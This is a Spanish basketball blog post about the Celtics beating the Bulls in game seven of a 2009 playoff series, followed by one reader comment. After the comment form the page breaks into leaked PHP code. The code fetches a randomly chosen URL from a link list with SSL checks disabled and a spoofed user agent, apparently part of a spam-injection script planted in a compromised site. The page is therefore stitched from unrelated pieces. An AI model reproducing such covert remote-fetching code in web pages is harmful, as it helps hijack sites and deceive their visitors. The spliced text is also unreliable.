Playoffs (02/05/2009): Piccoli dettagli di un mondo veloce

03 de May de 2009 por Jabho

By ARO_PASADO_NO_NEWTONIANO (Un grande)

Un único partido anoche, pero ¡qué partido!; el partido final de “la serie”.

Está vez no hubo prórrogas, ni canastas ganadoras en términos relativos, ni 17.5 cambios de liderato en el último cuarto, ni violencia explicita, ni camilleros 48 minutos alerta. No hubo nada de eso, pero tampoco hubo un dominio absoluto por parte de Boston que nos hiciera sentir el peso de los parpados al final del tercer cuarto. Digamos: al séptimo partido el señor (Stern) nos dio descanso permitiendo que fuera apto para personal con cardiopatías moderadas.

Comenzó el partido como un duelo Gordon-Allen, ya que este último venía de hacer 51 puntos del ala. Pero el británico tiro de flema y de talento se impuso en el duelo personal, pero sólo en el duelo personal y en este primer tramo, ya que al descanso Boston se colocó 14 puntos arriba gracias a un sprint final del equipo amigo del Leprechaun salvaje. Dados los antecedentes de la serie, nadie pensaba que iba a ser la ventaja definitiva, pero, a diferencia de otros días, el nivel de dramatismo por metro cuadrado fue menor. Acercándose el final del partido, de la serie, y casi de la vida, Chicago consiguió acercarse por debajo de los 5 puntos en 2 ocasiones, pero ambos envites fueron repelidos con brevedad, contundencia y mano firme

Ese insondable concepto que se suele hacer llamar “pequeños detalles” resultó, a la postre, clave. Esos rebotes de más recogidos por los verdes, junto al diferencial de asistencias, que ayudó a aumentar el porcentaje de tiros de campo, ya que el de tiros libres se lo lleva Chicago. La actuación de House, junto a la de Scalabrine se podría incluir en este apartado. También se podrían incluir aquí, pese a la aparente buena anotación de Gordon, sus malos porcentajes y, transmitidos por simpatía, los de Salmons.

Parecía que Pierce no daba más de sí pero hoy, volvió a erigirse en el capitán verde botella. Los méritos están hoy muy repartidos en el bando verde, pero la experiencia, el empaque, el temple, el tronío y el saber estar del capitán céltico se hizo notar en estertor del partido, cuando la presión de Chicago era más insistente y se barruntaba prorroga e insomnio. Todo ello gracias a sus rebotes, asistencias y tiros libres convertidos con los de la ciudad del viento soplándoles en la nuca.

Se acaba una serie de las más grandes series de primera ronda que se recuerdan. Boston sigue vivo, tiempo habrá para analizar el cruce con Orlando, pero está por ver como de reforzado o de perjudicado queda, ya que pese al derroche físico, puede que haya jugadores que hayan crecido. La duda estriba en si su crecimiento les permitirá alcanzar los pies de altura que alcance Superman.

LAS PREGUNTAS DEL DÍA

-Contra Orlando ¿seguirá siendo el papel de Mikki Moore testimonial?

-¿Es Derrick Rose mejor que Iniesta?

-¿Genera violencia ver a Marbury meter 2 tiros libres en el último minuto y con el marcador relativamente apretado?

Comenta

Un comentario a esta entrada

  1. Jabho dice:
    #1

    Serie larguísima que deja claro que los Bulls podrían haber optado a 4º-5º´s de conferenca a poco que hubieran empezado bien y a 2ª ronda. Boston bien dadas las circunstancias, que son las lesiones de Garnett y Powe y que las incorporaciones de Marbury y Moore no han funcionado, al menos por ahora.

    Como dices el esfuerzo puede pasar factura, pero ver a Rondo y Davis en esta serie ha valido la pena. Pedazo de jugadores. Ala, lo del banco es para preocuparse….

    Sin Garnett creo que Boston cumple con pasar de ronda. Ala, creo que tendremos opciones, en especial si Perkins controla las personales y es capaz de defender mínimamente a Howard.. Apuesto por los verdes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>